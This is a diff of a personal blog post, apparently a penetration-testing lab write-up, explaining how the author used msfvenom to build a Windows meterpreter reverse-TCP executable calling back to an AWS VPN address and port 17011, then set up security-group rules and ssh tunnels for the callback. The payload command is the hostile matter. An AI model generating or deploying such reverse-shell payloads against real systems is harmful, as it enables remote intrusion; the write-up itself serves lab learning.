rax-register/rax-register.github.io/_posts/2020-09-20-boykin-lab.md

     msfvenom -p windows/meterpreter/reverse_tcp LHOST=52.12.133.246 LPORT=17011 -f exe > win_the_war.exe

-    -p for a payload, specifically a Windows meterpreter which will create a reverse tcp connection LHOST is the IP address meterpreter will connect to, in this case the public IP of my AWS VPN.
+-p for a payload, specifically a Windows meterpreter which will create a reverse tcp connection

+LHOST is the IP address meterpreter will connect to, in this case the public IP of my AWS VPN.

 LPORT is the port meterpreter will connect to

-    -f for fomat, in this case windows executable or exe and finally we redirect the output into a file named “win_the_war.exe”
+-f for fomat, in this case windows executable or exe

+and finally we redirect the output into a file named “win_the_war.exe”

 ![](/images/boykin_lab2/87. msfvenom.png)

 For my setup, I connect from my home network to a VPN server I have set up on AWS.
 From there I connect to the target, which means the public IP address the meterpreter needs to call back to is the AWS VPN public IP, not my home IP address.
 So, I needed to set up ssh tunnels to direct the connection to my Kali machine.

-The first step was to open up a port on the AWS management console's security group, in this case 17011.
+The first step was to open up a port on the AWS management console's security group, in this case 17011, and only for traffic from 70.242.177.5.

 ![](/images/boykin_lab2/88. aws.png)